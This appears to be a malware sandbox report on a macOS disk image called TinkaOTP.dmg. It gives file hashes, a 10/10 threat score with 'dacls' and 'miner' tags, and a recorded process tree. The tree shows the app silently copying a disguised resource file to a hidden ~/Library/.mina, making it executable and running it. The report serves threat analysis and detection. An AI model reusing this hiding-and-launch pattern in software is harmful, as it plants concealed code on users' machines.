Overview

overview

10

Static

static

TinkaOTP.dmg

macos_amd64

10

Resubmissions

06-05-2023 12:48

230506-p126bahb92 1

06-05-2023 12:30

230506-pptd2ahb52 1

12-06-2021 11:09

210612-nqn9qdfdq2 10

12-06-2021 11:04

210612-h83qfce7ax 10

12-06-2021 10:49

210612-mkbljdyans 10

04-06-2021 11:41

210604-617hnrwhna 10

03-06-2021 22:37

210603-9ndgvgx33n 10

03-06-2021 17:09

210603-gxrvff2tan 10

03-06-2021 16:24

210603-lv4d7lhgcs 10

Analysis

  • max time network
    155s
  • platform
    macos_amd64
  • resource
    macos
  • submitted
    03-06-2021 17:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TinkaOTP.dmg

  • Size

    6.2MB

  • MD5

    81f8f0526740b55fe484c42126cd8396

  • SHA1

    fe83d95afce63e935dbe22aef40a164cee34f4e5

  • SHA256

    899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53

  • SHA512

    751c2195a47d5e263ccfb860037ce32b5bc3c9ca516b9806a0cf1bae2af9742bcc3c9965218fd938e6c3eaa5a90081ece877aeec56f667477686daa3aeb6d77a

Score
10/10
daclsminer

Malware Config

Signatures

Processes

  • /bin/sh
    sh -c "sudo open /Volumes/TinkaOTP/TinkaOTP.app"
    1⤵
      PID:464
    • /bin/bash
      sh -c "sudo open /Volumes/TinkaOTP/TinkaOTP.app"
      1⤵
        PID:464
      • /usr/bin/sudo
        sudo open /Volumes/TinkaOTP/TinkaOTP.app
        1⤵
          PID:464
          • /usr/bin/open
            open /Volumes/TinkaOTP/TinkaOTP.app
            2⤵
              PID:465
          • /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
            /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
            1⤵
              PID:466
            • /bin/bash
              /bin/bash -c "cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1"
              1⤵
                PID:469
                • /bin/cp
                  cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib /Users/run/Library/.mina
                  2⤵
                    PID:470
                  • /bin/chmod
                    chmod +x /Users/run/Library/.mina
                    2⤵
                      PID:471
                    • /Users/run/Library/.mina
                      /Users/run/Library/.mina
                      2⤵
                        PID:472

                    Network

                    MITRE ATT&CK Matrix

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads